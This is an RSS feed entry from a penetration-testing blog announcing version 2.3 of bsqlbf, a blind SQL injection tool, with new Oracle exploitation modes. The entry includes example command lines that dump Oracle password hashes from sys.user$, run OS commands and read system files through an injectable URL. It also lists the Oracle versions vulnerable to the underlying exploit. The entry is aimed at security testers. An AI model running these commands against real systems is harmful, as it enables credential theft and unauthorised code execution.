<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>www.notsosecure.com &#187; Add new tag</title>
	<atom:link href="http://www.notsosecure.com/folder2/tag/add-new-tag/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.notsosecure.com/folder2</link>
	<description>From Pentesters To Pentesters</description>
	<lastBuildDate>Fri, 28 Oct 2011 15:32:39 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Bsqlbf v 2.3 With Enhanced Oracle Exploitation</title>
		<link>http://www.notsosecure.com/folder2/2009/05/22/bsqlbf-v-23-with-enhanced-oracle-exploitation/</link>
		<comments>http://www.notsosecure.com/folder2/2009/05/22/bsqlbf-v-23-with-enhanced-oracle-exploitation/#comments</comments>
		<pubDate>Fri, 22 May 2009 17:58:04 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>
		<category><![CDATA[Tools for Wep App Testing]]></category>
		<category><![CDATA[Add new tag]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=219</guid>
		<description><![CDATA[A new version of bsqlbf is now available. The following are the new additions:

-------------------
 -type:        Type of injection:

        3:      Type 3  is extracting data with DBA privileges
         [...]]]></description>
			<content:encoded><![CDATA[<p>A new version of bsqlbf is now available. The following are the new additions:</p>
<pre>
-------------------
 -type:        Type of injection:

        3:      Type 3  is <strong>extracting data with DBA privileges</strong>
                 (e.g. Oracle password hashes from sys.user$)
        4:      Type 4 is <strong>O.S code execution</strong>(default: ping 127.0.0.1)
        5:      Type 5 is <strong>Reading O.S files</strong>(default: c:\boot.ini)
--------------------
Type 4 (O.S code execution) supports the following sub types:

 -stype:        How you want to execute command:

        0:      SType 0 (default) is based on <strong>java</strong>,
                universal but won't work against XE
        1:      SType 1 against <strong>oracle 9 with plsql_native_make_utility</strong>
        2:      SType 2 against <strong>oracle 10 with dbms_scheduler</strong>
</pre>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Examples: </p>
<p>./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 3 -match &#8220;true&#8221; -sql &#8220;select password from sys.user$ where rownum=1&#8243;</p>
<p>./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 4 -match &#8220;true&#8221; -cmd &#8220;ping notsosecure.com&#8221;</p>
<p>./bsqlbf-v2.3.pl -url http://192.168.1.1/injecti.jsp/1.jsp?p=1 -type 5 -match &#8220;true&#8221; -file &#8220;C:\boot.ini&#8221;</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Download from Project Homepage: <a href="http://code.google.com/p/bsqlbf-v2/">http://code.google.com/p/bsqlbf-v2/</a><br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>All these additions are based on dbms_export_extension exploit. This will work against the following oracle versions:<br />
Oracle 8.1.7.4, 9.2.0.1 &#8211; 9.2.0.7, 10.1.0.2 &#8211; 10.1.0.4, 10.2.0.1-10.2.0.2, XE</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Enjoy&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2009/05/22/bsqlbf-v-23-with-enhanced-oracle-exploitation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

